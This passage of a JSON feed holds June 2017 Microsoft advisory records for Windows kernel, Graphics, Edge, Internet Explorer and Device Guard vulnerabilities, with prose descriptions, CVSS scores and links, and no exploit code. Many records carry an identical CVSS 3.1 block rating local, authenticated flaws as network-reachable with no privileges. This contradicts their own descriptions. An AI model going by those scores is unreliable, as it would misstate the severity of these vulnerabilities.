An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how the Windows kernel initializes memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0300", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0300", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8476", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8476", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8476", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8474", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8474", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8474", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8473", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8473", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n\nTo exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0297", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0297", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0297", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8478", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8478", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8478", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nAn authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-19T07:00:00", "type": "mscve", "title": "Microsoft Graphics Component Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8575", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8575", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8575", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An Elevation of Privilege vulnerability exists when the Windows Graphics component improperly initializes contents in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows Graphics component initializes contents in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T07:00:00", "type": "mscve", "title": "Microsoft Graphics Component Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8576"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8576", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8576", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8522", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8522", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8522", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. The attacker could also take advantage of compromised websites, or websites that accept or host user-provided content or advertisements, by adding specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action, typically by an enticement in an email or instant message, or by getting the user to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8519", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8519", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8519", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. 
Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8496", "CVE-2017-8529"], "modified": "2017-08-23T07:00:00", "id": "MS:CVE-2017-8496", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8496", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. 
An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0216", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0216", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0216", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A 
security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0219", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0219", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0219", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-0215"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0215", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8531", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8531", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8531", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A vulnerability exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker could use this vulnerability to trick a user into loading a web page with malicious content.\n\nTo exploit the vulnerability, an attacker must either trick a user into loading a web page or visit a website. The web page could also be injected into a compromised website or ad network.\n\nThe security update addresses the vulnerability by correcting how the CSP validates documents.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": 